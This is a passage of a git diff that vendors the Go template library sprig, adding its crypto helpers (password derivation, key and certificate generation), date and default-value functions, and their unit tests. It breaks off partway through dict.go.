+func sha1sum(input string) string {
+ hash := sha1.Sum([]byte(input))
+ return hex.EncodeToString(hash[:])
+}
+
+// uuidv4 provides a safe and secure UUID v4 implementation
+func uuidv4() string {
+ return fmt.Sprintf("%s", uuid.New())
+}
+
+var master_password_seed = "com.lyndir.masterpassword"
+
+var password_type_templates = map[string][][]byte{
+ "maximum": {[]byte("anoxxxxxxxxxxxxxxxxx"), []byte("axxxxxxxxxxxxxxxxxno")},
+ "long": {[]byte("CvcvnoCvcvCvcv"), []byte("CvcvCvcvnoCvcv"), []byte("CvcvCvcvCvcvno"), []byte("CvccnoCvcvCvcv"), []byte("CvccCvcvnoCvcv"),
+ []byte("CvccCvcvCvcvno"), []byte("CvcvnoCvccCvcv"), []byte("CvcvCvccnoCvcv"), []byte("CvcvCvccCvcvno"), []byte("CvcvnoCvcvCvcc"),
+ []byte("CvcvCvcvnoCvcc"), []byte("CvcvCvcvCvccno"), []byte("CvccnoCvccCvcv"), []byte("CvccCvccnoCvcv"), []byte("CvccCvccCvcvno"),
+ []byte("CvcvnoCvccCvcc"), []byte("CvcvCvccnoCvcc"), []byte("CvcvCvccCvccno"), []byte("CvccnoCvcvCvcc"), []byte("CvccCvcvnoCvcc"),
+ []byte("CvccCvcvCvccno")},
+ "medium": {[]byte("CvcnoCvc"), []byte("CvcCvcno")},
+ "short": {[]byte("Cvcn")},
+ "basic": {[]byte("aaanaaan"), []byte("aannaaan"), []byte("aaannaaa")},
+ "pin": {[]byte("nnnn")},
+}
+
+var template_characters = map[byte]string{
+ 'V': "AEIOU",
+ 'C': "BCDFGHJKLMNPQRSTVWXYZ",
+ 'v': "aeiou",
+ 'c': "bcdfghjklmnpqrstvwxyz",
+ 'A': "AEIOUBCDFGHJKLMNPQRSTVWXYZ",
+ 'a': "AEIOUaeiouBCDFGHJKLMNPQRSTVWXYZbcdfghjklmnpqrstvwxyz",
+ 'n': "0123456789",
+ 'o': "@&%?,=[]_:-+*$#!'^~;()/.",
+ 'x': "AEIOUaeiouBCDFGHJKLMNPQRSTVWXYZbcdfghjklmnpqrstvwxyz0123456789!@#$%^&*()",
+}
+
+func derivePassword(counter uint32, password_type, password, user, site string) string {
+ var templates = password_type_templates[password_type]
+ if templates == nil {
+ return fmt.Sprintf("cannot find password template %s", password_type)
+ }
+
+ var buffer bytes.Buffer
+ buffer.WriteString(master_password_seed)
+ binary.Write(&buffer, binary.BigEndian, uint32(len(user)))
+ buffer.WriteString(user)
+
+ salt := buffer.Bytes()
+ key, err := scrypt.Key([]byte(password), salt, 32768, 8, 2, 64)
+ if err != nil {
+ return fmt.Sprintf("failed to derive password: %s", err)
+ }
+
+ buffer.Truncate(len(master_password_seed))
+ binary.Write(&buffer, binary.BigEndian, uint32(len(site)))
+ buffer.WriteString(site)
+ binary.Write(&buffer, binary.BigEndian, counter)
+
+ var hmacv = hmac.New(sha256.New, key)
+ hmacv.Write(buffer.Bytes())
+ var seed = hmacv.Sum(nil)
+ var temp = templates[int(seed[0])%len(templates)]
+
+ buffer.Truncate(0)
+ for i, element := range temp {
+ pass_chars := template_characters[element]
+ pass_char := pass_chars[int(seed[i+1])%len(pass_chars)]
+ buffer.WriteByte(pass_char)
+ }
+
+ return buffer.String()
+}
+
+func generatePrivateKey(typ string) string {
+ var priv interface{}
+ var err error
+ switch typ {
+ case "", "rsa":
+ // good enough for government work
+ priv, err = rsa.GenerateKey(rand.Reader, 4096)
+ case "dsa":
+ key := new(dsa.PrivateKey)
+ // again, good enough for government work
+ if err = dsa.GenerateParameters(&key.Parameters, rand.Reader, dsa.L2048N256); err != nil {
+ return fmt.Sprintf("failed to generate dsa params: %s", err)
+ }
+ err = dsa.GenerateKey(key, rand.Reader)
+ priv = key
+ case "ecdsa":
+ // again, good enough for government work
+ priv, err = ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
+ default:
+ return "Unknown type " + typ
+ }
+ if err != nil {
+ return fmt.Sprintf("failed to generate private key: %s", err)
+ }
+
+ return string(pem.EncodeToMemory(pemBlockForKey(priv)))
+}
+
+type DSAKeyFormat struct {
+ Version int
+ P, Q, G, Y, X *big.Int
+}
+
+func pemBlockForKey(priv interface{}) *pem.Block {
+ switch k := priv.(type) {
+ case *rsa.PrivateKey:
+ return &pem.Block{Type: "RSA PRIVATE KEY", Bytes: x509.MarshalPKCS1PrivateKey(k)}
+ case *dsa.PrivateKey:
+ val := DSAKeyFormat{
+ P: k.P, Q: k.Q, G: k.G,
+ Y: k.Y, X: k.X,
+ }
+ bytes, _ := asn1.Marshal(val)
+ return &pem.Block{Type: "DSA PRIVATE KEY", Bytes: bytes}
+ case *ecdsa.PrivateKey:
+ b, _ := x509.MarshalECPrivateKey(k)
+ return &pem.Block{Type: "EC PRIVATE KEY", Bytes: b}
+ default:
+ return nil
+ }
+}
+
+type certificate struct {
+ Cert string
+ Key string
+}
+
+func buildCustomCertificate(b64cert string, b64key string) (certificate, error) {
+ crt := certificate{}
+
+ cert, err := base64.StdEncoding.DecodeString(b64cert)
+ if err != nil {
+ return crt, errors.New("unable to decode base64 certificate")
+ }
+
+ key, err := base64.StdEncoding.DecodeString(b64key)
+ if err != nil {
+ return crt, errors.New("unable to decode base64 private key")
+ }
+
+ decodedCert, _ := pem.Decode(cert)
+ if decodedCert == nil {
+ return crt, errors.New("unable to decode certificate")
+ }
+ _, err = x509.ParseCertificate(decodedCert.Bytes)
+ if err != nil {
+ return crt, fmt.Errorf(
+ "error parsing certificate: decodedCert.Bytes: %s",
+ err,
+ )
+ }
+
+ decodedKey, _ := pem.Decode(key)
+ if decodedKey == nil {
+ return crt, errors.New("unable to decode key")
+ }
+ _, err = x509.ParsePKCS1PrivateKey(decodedKey.Bytes)
+ if err != nil {
+ return crt, fmt.Errorf(
+ "error parsing prive key: decodedKey.Bytes: %s",
+ err,
+ )
+ }
+
+ crt.Cert = string(cert)
+ crt.Key = string(key)
+
+ return crt, nil
+}
+
+func generateCertificateAuthority(
+ cn string,
+ daysValid int,
+) (certificate, error) {
+ ca := certificate{}
+
+ template, err := getBaseCertTemplate(cn, nil, nil, daysValid)
+ if err != nil {
+ return ca, err
+ }
+ // Override KeyUsage and IsCA
+ template.KeyUsage = x509.KeyUsageKeyEncipherment |
+ x509.KeyUsageDigitalSignature |
+ x509.KeyUsageCertSign
+ template.IsCA = true
+
+ priv, err := rsa.GenerateKey(rand.Reader, 2048)
+ if err != nil {
+ return ca, fmt.Errorf("error generating rsa key: %s", err)
+ }
+
+ ca.Cert, ca.Key, err = getCertAndKey(template, priv, template, priv)
+ if err != nil {
+ return ca, err
+ }
+
+ return ca, nil
+}
+
+func generateSelfSignedCertificate(
+ cn string,
+ ips []interface{},
+ alternateDNS []interface{},
+ daysValid int,
+) (certificate, error) {
+ cert := certificate{}
+
+ template, err := getBaseCertTemplate(cn, ips, alternateDNS, daysValid)
+ if err != nil {
+ return cert, err
+ }
+
+ priv, err := rsa.GenerateKey(rand.Reader, 2048)
+ if err != nil {
+ return cert, fmt.Errorf("error generating rsa key: %s", err)
+ }
+
+ cert.Cert, cert.Key, err = getCertAndKey(template, priv, template, priv)
+ if err != nil {
+ return cert, err
+ }
+
+ return cert, nil
+}
+
+func generateSignedCertificate(
+ cn string,
+ ips []interface{},
+ alternateDNS []interface{},
+ daysValid int,
+ ca certificate,
+) (certificate, error) {
+ cert := certificate{}
+
+ decodedSignerCert, _ := pem.Decode([]byte(ca.Cert))
+ if decodedSignerCert == nil {
+ return cert, errors.New("unable to decode certificate")
+ }
+ signerCert, err := x509.ParseCertificate(decodedSignerCert.Bytes)
+ if err != nil {
+ return cert, fmt.Errorf(
+ "error parsing certificate: decodedSignerCert.Bytes: %s",
+ err,
+ )
+ }
+ decodedSignerKey, _ := pem.Decode([]byte(ca.Key))
+ if decodedSignerKey == nil {
+ return cert, errors.New("unable to decode key")
+ }
+ signerKey, err := x509.ParsePKCS1PrivateKey(decodedSignerKey.Bytes)
+ if err != nil {
+ return cert, fmt.Errorf(
+ "error parsing prive key: decodedSignerKey.Bytes: %s",
+ err,
+ )
+ }
+
+ template, err := getBaseCertTemplate(cn, ips, alternateDNS, daysValid)
+ if err != nil {
+ return cert, err
+ }
+
+ priv, err := rsa.GenerateKey(rand.Reader, 2048)
+ if err != nil {
+ return cert, fmt.Errorf("error generating rsa key: %s", err)
+ }
+
+ cert.Cert, cert.Key, err = getCertAndKey(
+ template,
+ priv,
+ signerCert,
+ signerKey,
+ )
+ if err != nil {
+ return cert, err
+ }
+
+ return cert, nil
+}
+
+func getCertAndKey(
+ template *x509.Certificate,
+ signeeKey *rsa.PrivateKey,
+ parent *x509.Certificate,
+ signingKey *rsa.PrivateKey,
+) (string, string, error) {
+ derBytes, err := x509.CreateCertificate(
+ rand.Reader,
+ template,
+ parent,
+ &signeeKey.PublicKey,
+ signingKey,
+ )
+ if err != nil {
+ return "", "", fmt.Errorf("error creating certificate: %s", err)
+ }
+
+ certBuffer := bytes.Buffer{}
+ if err := pem.Encode(
+ &certBuffer,
+ &pem.Block{Type: "CERTIFICATE", Bytes: derBytes},
+ ); err != nil {
+ return "", "", fmt.Errorf("error pem-encoding certificate: %s", err)
+ }
+
+ keyBuffer := bytes.Buffer{}
+ if err := pem.Encode(
+ &keyBuffer,
+ &pem.Block{
+ Type: "RSA PRIVATE KEY",
+ Bytes: x509.MarshalPKCS1PrivateKey(signeeKey),
+ },
+ ); err != nil {
+ return "", "", fmt.Errorf("error pem-encoding key: %s", err)
+ }
+
+ return string(certBuffer.Bytes()), string(keyBuffer.Bytes()), nil
+}
+
+func getBaseCertTemplate(
+ cn string,
+ ips []interface{},
+ alternateDNS []interface{},
+ daysValid int,
+) (*x509.Certificate, error) {
+ ipAddresses, err := getNetIPs(ips)
+ if err != nil {
+ return nil, err
+ }
+ dnsNames, err := getAlternateDNSStrs(alternateDNS)
+ if err != nil {
+ return nil, err
+ }
+ return &x509.Certificate{
+ SerialNumber: big.NewInt(1),
+ Subject: pkix.Name{
+ CommonName: cn,
+ },
+ IPAddresses: ipAddresses,
+ DNSNames: dnsNames,
+ NotBefore: time.Now(),
+ NotAfter: time.Now().Add(time.Hour * 24 * time.Duration(daysValid)),
+ KeyUsage: x509.KeyUsageKeyEncipherment | x509.KeyUsageDigitalSignature,
+ ExtKeyUsage: []x509.ExtKeyUsage{
+ x509.ExtKeyUsageServerAuth,
+ x509.ExtKeyUsageClientAuth,
+ },
+ BasicConstraintsValid: true,
+ }, nil
+}
+
+func getNetIPs(ips []interface{}) ([]net.IP, error) {
+ if ips == nil {
+ return []net.IP{}, nil
+ }
+ var ipStr string
+ var ok bool
+ var netIP net.IP
+ netIPs := make([]net.IP, len(ips))
+ for i, ip := range ips {
+ ipStr, ok = ip.(string)
+ if !ok {
+ return nil, fmt.Errorf("error parsing ip: %v is not a string", ip)
+ }
+ netIP = net.ParseIP(ipStr)
+ if netIP == nil {
+ return nil, fmt.Errorf("error parsing ip: %s", ipStr)
+ }
+ netIPs[i] = netIP
+ }
+ return netIPs, nil
+}
+
+func getAlternateDNSStrs(alternateDNS []interface{}) ([]string, error) {
+ if alternateDNS == nil {
+ return []string{}, nil
+ }
+ var dnsStr string
+ var ok bool
+ alternateDNSStrs := make([]string, len(alternateDNS))
+ for i, dns := range alternateDNS {
+ dnsStr, ok = dns.(string)
+ if !ok {
+ return nil, fmt.Errorf(
+ "error processing alternate dns name: %v is not a string",
+ dns,
+ )
+ }
+ alternateDNSStrs[i] = dnsStr
+ }
+ return alternateDNSStrs, nil
+}
diff --git a/vendor/github.com/Masterminds/sprig/crypto_test.go b/vendor/github.com/Masterminds/sprig/crypto_test.go
new file mode 100644
index 0000000000..77b3e3fb2c
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/crypto_test.go
@@ -0,0 +1,259 @@
+package sprig
+
+import (
+ "crypto/x509"
+ "encoding/base64"
+ "encoding/pem"
+ "fmt"
+ "strings"
+ "testing"
+
+ "github.com/stretchr/testify/assert"
+)
+
+const (
+ beginCertificate = "-----BEGIN CERTIFICATE-----"
+ endCertificate = "-----END CERTIFICATE-----"
+)
+
+func TestSha256Sum(t *testing.T) {
+ tpl := `{{"abc" | sha256sum}}`
+ if err := runt(tpl, "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad"); err != nil {
+ t.Error(err)
+ }
+}
+func TestSha1Sum(t *testing.T) {
+ tpl := `{{"abc" | sha1sum}}`
+ if err := runt(tpl, "a9993e364706816aba3e25717850c26c9cd0d89d"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestDerivePassword(t *testing.T) {
+ expectations := map[string]string{
+ `{{derivePassword 1 "long" "password" "user" "example.com"}}`: "ZedaFaxcZaso9*",
+ `{{derivePassword 2 "long" "password" "user" "example.com"}}`: "Fovi2@JifpTupx",
+ `{{derivePassword 1 "maximum" "password" "user" "example.com"}}`: "pf4zS1LjCg&LjhsZ7T2~",
+ `{{derivePassword 1 "medium" "password" "user" "example.com"}}`: "ZedJuz8$",
+ `{{derivePassword 1 "basic" "password" "user" "example.com"}}`: "pIS54PLs",
+ `{{derivePassword 1 "short" "password" "user" "example.com"}}`: "Zed5",
+ `{{derivePassword 1 "pin" "password" "user" "example.com"}}`: "6685",
+ }
+
+ for tpl, result := range expectations {
+ out, err := runRaw(tpl, nil)
+ if err != nil {
+ t.Error(err)
+ }
+ if 0 != strings.Compare(out, result) {
+ t.Error("Generated password does not match for", tpl)
+ }
+ }
+}
+
+// NOTE(bacongobbler): this test is really _slow_ because of how long it takes to compute
+// and generate a new crypto key.
+func TestGenPrivateKey(t *testing.T) {
+ // test that calling by default generates an RSA private key
+ tpl := `{{genPrivateKey ""}}`
+ out, err := runRaw(tpl, nil)
+ if err != nil {
+ t.Error(err)
+ }
+ if !strings.Contains(out, "RSA PRIVATE KEY") {
+ t.Error("Expected RSA PRIVATE KEY")
+ }
+ // test all acceptable arguments
+ tpl = `{{genPrivateKey "rsa"}}`
+ out, err = runRaw(tpl, nil)
+ if err != nil {
+ t.Error(err)
+ }
+ if !strings.Contains(out, "RSA PRIVATE KEY") {
+ t.Error("Expected RSA PRIVATE KEY")
+ }
+ tpl = `{{genPrivateKey "dsa"}}`
+ out, err = runRaw(tpl, nil)
+ if err != nil {
+ t.Error(err)
+ }
+ if !strings.Contains(out, "DSA PRIVATE KEY") {
+ t.Error("Expected DSA PRIVATE KEY")
+ }
+ tpl = `{{genPrivateKey "ecdsa"}}`
+ out, err = runRaw(tpl, nil)
+ if err != nil {
+ t.Error(err)
+ }
+ if !strings.Contains(out, "EC PRIVATE KEY") {
+ t.Error("Expected EC PRIVATE KEY")
+ }
+ // test bad
+ tpl = `{{genPrivateKey "bad"}}`
+ out, err = runRaw(tpl, nil)
+ if err != nil {
+ t.Error(err)
+ }
+ if out != "Unknown type bad" {
+ t.Error("Expected type 'bad' to be an unknown crypto algorithm")
+ }
+ // ensure that we can base64 encode the string
+ tpl = `{{genPrivateKey "rsa" | b64enc}}`
+ out, err = runRaw(tpl, nil)
+ if err != nil {
+ t.Error(err)
+ }
+}
+
+func TestUUIDGeneration(t *testing.T) {
+ tpl := `{{uuidv4}}`
+ out, err := runRaw(tpl, nil)
+ if err != nil {
+ t.Error(err)
+ }
+
+ if len(out) != 36 {
+ t.Error("Expected UUID of length 36")
+ }
+
+ out2, err := runRaw(tpl, nil)
+ if err != nil {
+ t.Error(err)
+ }
+
+ if out == out2 {
+ t.Error("Expected subsequent UUID generations to be different")
+ }
+}
+
+func TestBuildCustomCert(t *testing.T) {
+ ca, _ := generateCertificateAuthority("example.com", 365)
+ tpl := fmt.Sprintf(
+ `{{- $ca := buildCustomCert "%s" "%s"}}
+{{- $ca.Cert }}`,
+ base64.StdEncoding.EncodeToString([]byte(ca.Cert)),
+ base64.StdEncoding.EncodeToString([]byte(ca.Key)),
+ )
+ out, err := runRaw(tpl, nil)
+ if err != nil {
+ t.Error(err)
+ }
+
+ tpl2 := fmt.Sprintf(
+ `{{- $ca := buildCustomCert "%s" "%s"}}
+{{- $ca.Cert }}`,
+ base64.StdEncoding.EncodeToString([]byte("fail")),
+ base64.StdEncoding.EncodeToString([]byte(ca.Key)),
+ )
+ out2, _ := runRaw(tpl2, nil)
+
+ assert.Equal(t, out, ca.Cert)
+ assert.NotEqual(t, out2, ca.Cert)
+}
+
+func TestGenCA(t *testing.T) {
+ const cn = "foo-ca"
+
+ tpl := fmt.Sprintf(
+ `{{- $ca := genCA "%s" 365 }}
+{{ $ca.Cert }}
+`,
+ cn,
+ )
+ out, err := runRaw(tpl, nil)
+ if err != nil {
+ t.Error(err)
+ }
+ assert.Contains(t, out, beginCertificate)
+ assert.Contains(t, out, endCertificate)
+
+ decodedCert, _ := pem.Decode([]byte(out))
+ assert.Nil(t, err)
+ cert, err := x509.ParseCertificate(decodedCert.Bytes)
+ assert.Nil(t, err)
+
+ assert.Equal(t, cn, cert.Subject.CommonName)
+ assert.True(t, cert.IsCA)
+}
+
+func TestGenSelfSignedCert(t *testing.T) {
+ const (
+ cn = "foo.com"
+ ip1 = "10.0.0.1"
+ ip2 = "10.0.0.2"
+ dns1 = "bar.com"
+ dns2 = "bat.com"
+ )
+
+ tpl := fmt.Sprintf(
+ `{{- $cert := genSelfSignedCert "%s" (list "%s" "%s") (list "%s" "%s") 365 }}
+{{ $cert.Cert }}`,
+ cn,
+ ip1,
+ ip2,
+ dns1,
+ dns2,
+ )
+
+ out, err := runRaw(tpl, nil)
+ if err != nil {
+ t.Error(err)
+ }
+ assert.Contains(t, out, beginCertificate)
+ assert.Contains(t, out, endCertificate)
+
+ decodedCert, _ := pem.Decode([]byte(out))
+ assert.Nil(t, err)
+ cert, err := x509.ParseCertificate(decodedCert.Bytes)
+ assert.Nil(t, err)
+
+ assert.Equal(t, cn, cert.Subject.CommonName)
+ assert.Equal(t, 2, len(cert.IPAddresses))
+ assert.Equal(t, ip1, cert.IPAddresses[0].String())
+ assert.Equal(t, ip2, cert.IPAddresses[1].String())
+ assert.Contains(t, cert.DNSNames, dns1)
+ assert.Contains(t, cert.DNSNames, dns2)
+ assert.False(t, cert.IsCA)
+}
+
+func TestGenSignedCert(t *testing.T) {
+ const (
+ cn = "foo.com"
+ ip1 = "10.0.0.1"
+ ip2 = "10.0.0.2"
+ dns1 = "bar.com"
+ dns2 = "bat.com"
+ )
+
+ tpl := fmt.Sprintf(
+ `{{- $ca := genCA "foo" 365 }}
+{{- $cert := genSignedCert "%s" (list "%s" "%s") (list "%s" "%s") 365 $ca }}
+{{ $cert.Cert }}
+`,
+ cn,
+ ip1,
+ ip2,
+ dns1,
+ dns2,
+ )
+ out, err := runRaw(tpl, nil)
+ if err != nil {
+ t.Error(err)
+ }
+
+ assert.Contains(t, out, beginCertificate)
+ assert.Contains(t, out, endCertificate)
+
+ decodedCert, _ := pem.Decode([]byte(out))
+ assert.Nil(t, err)
+ cert, err := x509.ParseCertificate(decodedCert.Bytes)
+ assert.Nil(t, err)
+
+ assert.Equal(t, cn, cert.Subject.CommonName)
+ assert.Equal(t, 2, len(cert.IPAddresses))
+ assert.Equal(t, ip1, cert.IPAddresses[0].String())
+ assert.Equal(t, ip2, cert.IPAddresses[1].String())
+ assert.Contains(t, cert.DNSNames, dns1)
+ assert.Contains(t, cert.DNSNames, dns2)
+ assert.False(t, cert.IsCA)
+}
diff --git a/vendor/github.com/Masterminds/sprig/date.go b/vendor/github.com/Masterminds/sprig/date.go
new file mode 100644
index 0000000000..1c2c3653c8
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/date.go
@@ -0,0 +1,76 @@
+package sprig
+
+import (
+ "time"
+)
+
+// Given a format and a date, format the date string.
+//
+// Date can be a `time.Time` or an `int, int32, int64`.
+// In the later case, it is treated as seconds since UNIX
+// epoch.
+func date(fmt string, date interface{}) string {
+ return dateInZone(fmt, date, "Local")
+}
+
+func htmlDate(date interface{}) string {
+ return dateInZone("2006-01-02", date, "Local")
+}
+
+func htmlDateInZone(date interface{}, zone string) string {
+ return dateInZone("2006-01-02", date, zone)
+}
+
+func dateInZone(fmt string, date interface{}, zone string) string {
+ var t time.Time
+ switch date := date.(type) {
+ default:
+ t = time.Now()
+ case time.Time:
+ t = date
+ case int64:
+ t = time.Unix(date, 0)
+ case int:
+ t = time.Unix(int64(date), 0)
+ case int32:
+ t = time.Unix(int64(date), 0)
+ }
+
+ loc, err := time.LoadLocation(zone)
+ if err != nil {
+ loc, _ = time.LoadLocation("UTC")
+ }
+
+ return t.In(loc).Format(fmt)
+}
+
+func dateModify(fmt string, date time.Time) time.Time {
+ d, err := time.ParseDuration(fmt)
+ if err != nil {
+ return date
+ }
+ return date.Add(d)
+}
+
+func dateAgo(date interface{}) string {
+ var t time.Time
+
+ switch date := date.(type) {
+ default:
+ t = time.Now()
+ case time.Time:
+ t = date
+ case int64:
+ t = time.Unix(date, 0)
+ case int:
+ t = time.Unix(int64(date), 0)
+ }
+ // Drop resolution to seconds
+ duration := time.Since(t).Round(time.Second)
+ return duration.String()
+}
+
+func toDate(fmt, str string) time.Time {
+ t, _ := time.ParseInLocation(fmt, str, time.Local)
+ return t
+}
diff --git a/vendor/github.com/Masterminds/sprig/date_test.go b/vendor/github.com/Masterminds/sprig/date_test.go
new file mode 100644
index 0000000000..b98200dd03
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/date_test.go
@@ -0,0 +1,36 @@
+package sprig
+
+import (
+ "testing"
+ "time"
+)
+
+func TestHtmlDate(t *testing.T) {
+ t.Skip()
+ tpl := `{{ htmlDate 0}}`
+ if err := runt(tpl, "1970-01-01"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestAgo(t *testing.T) {
+ tpl := "{{ ago .Time }}"
+ if err := runtv(tpl, "2m5s", map[string]interface{}{"Time": time.Now().Add(-125 * time.Second)}); err != nil {
+ t.Error(err)
+ }
+
+ if err := runtv(tpl, "2h34m17s", map[string]interface{}{"Time": time.Now().Add(-(2*3600 + 34*60 + 17) * time.Second)}); err != nil {
+ t.Error(err)
+ }
+
+ if err := runtv(tpl, "-5s", map[string]interface{}{"Time": time.Now().Add(5 * time.Second)}); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestToDate(t *testing.T) {
+ tpl := `{{toDate "2006-01-02" "2017-12-31" | date "02/01/2006"}}`
+ if err := runt(tpl, "31/12/2017"); err != nil {
+ t.Error(err)
+ }
+}
diff --git a/vendor/github.com/Masterminds/sprig/defaults.go b/vendor/github.com/Masterminds/sprig/defaults.go
new file mode 100644
index 0000000000..f0161317dc
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/defaults.go
@@ -0,0 +1,84 @@
+package sprig
+
+import (
+ "encoding/json"
+ "reflect"
+)
+
+// dfault checks whether `given` is set, and returns default if not set.
+//
+// This returns `d` if `given` appears not to be set, and `given` otherwise.
+//
+// For numeric types 0 is unset.
+// For strings, maps, arrays, and slices, len() = 0 is considered unset.
+// For bool, false is unset.
+// Structs are never considered unset.
+//
+// For everything else, including pointers, a nil value is unset.
+func dfault(d interface{}, given ...interface{}) interface{} {
+
+ if empty(given) || empty(given[0]) {
+ return d
+ }
+ return given[0]
+}
+
+// empty returns true if the given value has the zero value for its type.
+func empty(given interface{}) bool {
+ g := reflect.ValueOf(given)
+ if !g.IsValid() {
+ return true
+ }
+
+ // Basically adapted from text/template.isTrue
+ switch g.Kind() {
+ default:
+ return g.IsNil()
+ case reflect.Array, reflect.Slice, reflect.Map, reflect.String:
+ return g.Len() == 0
+ case reflect.Bool:
+ return g.Bool() == false
+ case reflect.Complex64, reflect.Complex128:
+ return g.Complex() == 0
+ case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64:
+ return g.Int() == 0
+ case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr:
+ return g.Uint() == 0
+ case reflect.Float32, reflect.Float64:
+ return g.Float() == 0
+ case reflect.Struct:
+ return false
+ }
+ return true
+}
+
+// coalesce returns the first non-empty value.
+func coalesce(v ...interface{}) interface{} {
+ for _, val := range v {
+ if !empty(val) {
+ return val
+ }
+ }
+ return nil
+}
+
+// toJson encodes an item into a JSON string
+func toJson(v interface{}) string {
+ output, _ := json.Marshal(v)
+ return string(output)
+}
+
+// toPrettyJson encodes an item into a pretty (indented) JSON string
+func toPrettyJson(v interface{}) string {
+ output, _ := json.MarshalIndent(v, "", " ")
+ return string(output)
+}
+
+// ternary returns the first value if the last value is true, otherwise returns the second value.
+func ternary(vt interface{}, vf interface{}, v bool) interface{} {
+ if v {
+ return vt
+ }
+
+ return vf
+}
diff --git a/vendor/github.com/Masterminds/sprig/defaults_test.go b/vendor/github.com/Masterminds/sprig/defaults_test.go
new file mode 100644
index 0000000000..226d914cbf
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/defaults_test.go
@@ -0,0 +1,129 @@
+package sprig
+
+import (
+ "testing"
+
+ "github.com/stretchr/testify/assert"
+)
+
+func TestDefault(t *testing.T) {
+ tpl := `{{"" | default "foo"}}`
+ if err := runt(tpl, "foo"); err != nil {
+ t.Error(err)
+ }
+ tpl = `{{default "foo" 234}}`
+ if err := runt(tpl, "234"); err != nil {
+ t.Error(err)
+ }
+ tpl = `{{default "foo" 2.34}}`
+ if err := runt(tpl, "2.34"); err != nil {
+ t.Error(err)
+ }
+
+ tpl = `{{ .Nothing | default "123" }}`
+ if err := runt(tpl, "123"); err != nil {
+ t.Error(err)
+ }
+ tpl = `{{ default "123" }}`
+ if err := runt(tpl, "123"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestEmpty(t *testing.T) {
+ tpl := `{{if empty 1}}1{{else}}0{{end}}`
+ if err := runt(tpl, "0"); err != nil {
+ t.Error(err)
+ }
+
+ tpl = `{{if empty 0}}1{{else}}0{{end}}`
+ if err := runt(tpl, "1"); err != nil {
+ t.Error(err)
+ }
+ tpl = `{{if empty ""}}1{{else}}0{{end}}`
+ if err := runt(tpl, "1"); err != nil {
+ t.Error(err)
+ }
+ tpl = `{{if empty 0.0}}1{{else}}0{{end}}`
+ if err := runt(tpl, "1"); err != nil {
+ t.Error(err)
+ }
+ tpl = `{{if empty false}}1{{else}}0{{end}}`
+ if err := runt(tpl, "1"); err != nil {
+ t.Error(err)
+ }
+
+ dict := map[string]interface{}{"top": map[string]interface{}{}}
+ tpl = `{{if empty .top.NoSuchThing}}1{{else}}0{{end}}`
+ if err := runtv(tpl, "1", dict); err != nil {
+ t.Error(err)
+ }
+ tpl = `{{if empty .bottom.NoSuchThing}}1{{else}}0{{end}}`
+ if err := runtv(tpl, "1", dict); err != nil {
+ t.Error(err)
+ }
+}
+func TestCoalesce(t *testing.T) {
+ tests := map[string]string{
+ `{{ coalesce 1 }}`: "1",
+ `{{ coalesce "" 0 nil 2 }}`: "2",
+ `{{ $two := 2 }}{{ coalesce "" 0 nil $two }}`: "2",
+ `{{ $two := 2 }}{{ coalesce "" $two 0 0 0 }}`: "2",
+ `{{ $two := 2 }}{{ coalesce "" $two 3 4 5 }}`: "2",
+ `{{ coalesce }}`: "",
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+
+ dict := map[string]interface{}{"top": map[string]interface{}{}}
+ tpl := `{{ coalesce .top.NoSuchThing .bottom .bottom.dollar "airplane"}}`
+ if err := runtv(tpl, "airplane", dict); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestToJson(t *testing.T) {
+ dict := map[string]interface{}{"Top": map[string]interface{}{"bool": true, "string": "test", "number": 42}}
+
+ tpl := `{{.Top | toJson}}`
+ expected := `{"bool":true,"number":42,"string":"test"}`
+ if err := runtv(tpl, expected, dict); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestToPrettyJson(t *testing.T) {
+ dict := map[string]interface{}{"Top": map[string]interface{}{"bool": true, "string": "test", "number": 42}}
+ tpl := `{{.Top | toPrettyJson}}`
+ expected := `{
+ "bool": true,
+ "number": 42,
+ "string": "test"
+}`
+ if err := runtv(tpl, expected, dict); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestTernary(t *testing.T) {
+ tpl := `{{true | ternary "foo" "bar"}}`
+ if err := runt(tpl, "foo"); err != nil {
+ t.Error(err)
+ }
+
+ tpl = `{{ternary "foo" "bar" true}}`
+ if err := runt(tpl, "foo"); err != nil {
+ t.Error(err)
+ }
+
+ tpl = `{{false | ternary "foo" "bar"}}`
+ if err := runt(tpl, "bar"); err != nil {
+ t.Error(err)
+ }
+
+ tpl = `{{ternary "foo" "bar" false}}`
+ if err := runt(tpl, "bar"); err != nil {
+ t.Error(err)
+ }
+}
diff --git a/vendor/github.com/Masterminds/sprig/dict.go b/vendor/github.com/Masterminds/sprig/dict.go
new file mode 100644
index 0000000000..59076c0182
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/dict.go
@@ -0,0 +1,88 @@
+package sprig
+
+import "github.com/imdario/mergo"
+
+func set(d map[string]interface{}, key string, value interface{}) map[string]interface{} {
+ d[key] = value
+ return d
+}
+
+func unset(d map[string]interface{}, key string) map[string]interface{} {
+ delete(d, key)
+ return d
+}
+
+func hasKey(d map[string]interface{}, key string) bool {
+ _, ok := d[key]
+ return ok
+}
+
+func pluck(key string, d ...map[string]interface{}) []interface{} {
+ res := []interface{}{}
+ for _, dict := range d {
+ if val, ok := dict[key]; ok {
+ res = append(res, val)
+ }
+ }
+ return res
+}
+
+func keys(dicts ...map[string]interface{}) []string {
+ k := []string{}
+ for _, dict := range dicts {
+ for key := range dict {
+ k = append(k, key)
+ }
+ }
+ return k
+}
+
+func pick(dict map[string]interface{}, keys ...string) map[string]interface{} {
+ res := map[string]interface{}{}
+ for _, k := range keys {
+ if v, ok := dict[k]; ok {
+ res[k] = v
+ }
